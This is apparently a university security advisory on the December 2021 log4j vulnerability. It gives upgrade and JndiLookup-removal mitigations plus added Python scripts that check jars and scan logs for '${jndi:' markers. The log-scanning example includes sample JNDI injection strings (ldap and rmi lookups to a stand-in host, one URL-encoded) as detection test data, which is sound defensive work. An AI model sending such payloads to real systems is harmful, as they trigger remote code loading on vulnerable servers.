Updated Dec. 20, 2021
Summary
A critical vulnerability has been found in the widely used Java logging library log4j. This vulnerability can allow remote code execution by an unauthenticated attacker, is easy to exploit, and proof of concept code is publicly available.
Vulnerable Library
Mitigations
- Upgrade to the latest log4j version, ≥2.17.0
- If you are using a version older than 2.17.0 and cannot upgrade, the vulnerability can be mitigated by substituting a non-vulnerable or empty implementation of the class org.apache.logging.log4j.core.lookup.JndiLookup, in a way that your classloader uses your replacement instead of the vulnerable version of the class. Refer to your application's or stack's class loading documentation to understand this behavior.
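To verify which of the two mitigations above applies to a deployed jar, the following Python script (an added example, not part of the original advisory or of the log4j project) inspects every log4j-core*.jar under a directory and reports whether the manifest version is at or above 2.17.0 and whether the JndiLookup class entry is still present. It assumes the jar carries an Implementation-Version header in META-INF/MANIFEST.MF; the sample jars it builds for demonstration are constructed and contain only placeholder bytes, not real class files.

```python
import re
import tempfile
import zipfile
from pathlib import Path

# Version at or above which the advisory treats log4j as fixed.
FIXED_VERSION = (2, 17, 0)
# Zip entry for the class the advisory says to replace with a harmless implementation.
JNDI_LOOKUP_ENTRY = "org/apache/logging/log4j/core/lookup/JndiLookup.class"


def parse_version(text):
    """Turn '2.14.1' into (2, 14, 1); a missing patch number counts as 0,
    and any trailing qualifier (e.g. '-rc1') is ignored."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", text.strip())
    if not m:
        return None
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))


def manifest_version(zf):
    """Read Implementation-Version from the jar manifest (assumption: the
    log4j-core jar ships this header); None if absent."""
    try:
        data = zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
    except KeyError:
        return None
    for line in data.splitlines():
        if line.startswith("Implementation-Version:"):
            return line.split(":", 1)[1].strip()
    return None


def assess_jar(path):
    """Describe one jar: manifest version, presence of JndiLookup.class, verdict."""
    with zipfile.ZipFile(path) as zf:
        names = set(zf.namelist())
        version = manifest_version(zf)
    has_lookup = JNDI_LOOKUP_ENTRY in names
    parsed = parse_version(version) if version else None
    if parsed is not None and parsed >= FIXED_VERSION:
        verdict = "ok: fixed version"
    elif not has_lookup:
        verdict = "mitigated: JndiLookup.class absent"
    else:
        verdict = "vulnerable: old version with JndiLookup.class present"
    return {"path": str(path), "version": version,
            "has_jndi_lookup": has_lookup, "verdict": verdict}


def scan_tree(root):
    """Assess every log4j-core*.jar found recursively under root
    (jars nested inside other archives are not opened)."""
    return [assess_jar(p) for p in sorted(Path(root).rglob("log4j-core*.jar"))]


def _build_sample_jar(path, version, include_lookup):
    """Constructed sample jar for demonstration only; not a real log4j build."""
    with zipfile.ZipFile(path, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF",
                    f"Manifest-Version: 1.0\nImplementation-Version: {version}\n")
        if include_lookup:
            zf.writestr(JNDI_LOOKUP_ENTRY, b"\xca\xfe\xba\xbe")  # class-file magic only
        zf.writestr("org/apache/logging/log4j/core/Logger.class", b"\xca\xfe\xba\xbe")


def demo():
    """Build three constructed jars in a temp directory and return
    a mapping of jar file name to verdict."""
    tmp = Path(tempfile.mkdtemp())
    _build_sample_jar(tmp / "log4j-core-2.14.1.jar", "2.14.1", True)
    _build_sample_jar(tmp / "log4j-core-2.14.1-patched.jar", "2.14.1", False)
    _build_sample_jar(tmp / "log4j-core-2.17.0.jar", "2.17.0", True)
    return {Path(r["path"]).name: r["verdict"] for r in scan_tree(tmp)}


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(f"{name}: {verdict}")
```

Run it against a real deployment with `scan_tree("/opt/myapp")`; a result of "mitigated" only means the class entry is gone from that jar, so if your stack loads log4j from a fat jar, a WAR, or a vendor bundle, check those archives as well.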
If you are unable to quickly mitigate this vulnerability on a P3 or P4 system, please open a ticket with ISO by emailing security@berkeley.edu
If you administer a publicly accessible P3 or P4 system that is vulnerable, after mitigation, examine your access and application logs for occurrences of "${jndi:". If any such entries are found, please open a ticket with ISO by emailing security@berkeley.edu
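As an added example of the log review described above (not part of the original advisory), the following Python script reports every log line containing the "${jndi:" marker. It goes slightly beyond the literal string in two ways that matter for access logs: the match is case-insensitive, and each line is also checked after URL-decoding, because web servers typically record the request as sent, so a marker arriving in a query string appears as %24%7Bjndi%3A. The sample log lines are constructed for the demonstration and use a reserved .invalid hostname.

```python
import urllib.parse

# Literal marker the advisory asks administrators to look for.
MARKER = "${jndi:"

# Constructed sample access-log lines (not from any real system).
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:14:02:11 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:14:03:40 +0000] "GET /login HTTP/1.1" 200 87 "-" "${jndi:ldap://lookup.invalid/a}"',
    '10.0.0.9 - - [10/Dec/2021:14:03:41 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2Flookup.invalid%2Fa%7D HTTP/1.1" 200 87 "-" "curl/7.79"',
    '10.0.0.7 - - [10/Dec/2021:14:05:02 +0000] "POST /api HTTP/1.1" 500 0 "-" "${JNDI:rmi://lookup.invalid/b}"',
]


def find_jndi_hits(lines):
    """Return (line_number, line) for every line that contains the marker,
    either as written or after URL-decoding, ignoring case."""
    hits = []
    for n, line in enumerate(lines, start=1):
        raw = line.rstrip("\n")
        candidates = (raw, urllib.parse.unquote(raw))
        if any(MARKER in c.lower() for c in candidates):
            hits.append((n, raw))
    return hits


def scan_log_file(path):
    """Scan a log file on disk; errors='replace' keeps binary junk from aborting the scan."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return find_jndi_hits(fh)


if __name__ == "__main__":
    for n, line in find_jndi_hits(SAMPLE_LOG):
        print(f"line {n}: {line}")
```

On a real host, run `scan_log_file` over each access and application log (including rotated and compressed copies, decompressed first); any hit is the trigger the advisory names for opening a ticket with ISO, and the matched lines should be preserved unmodified for that report.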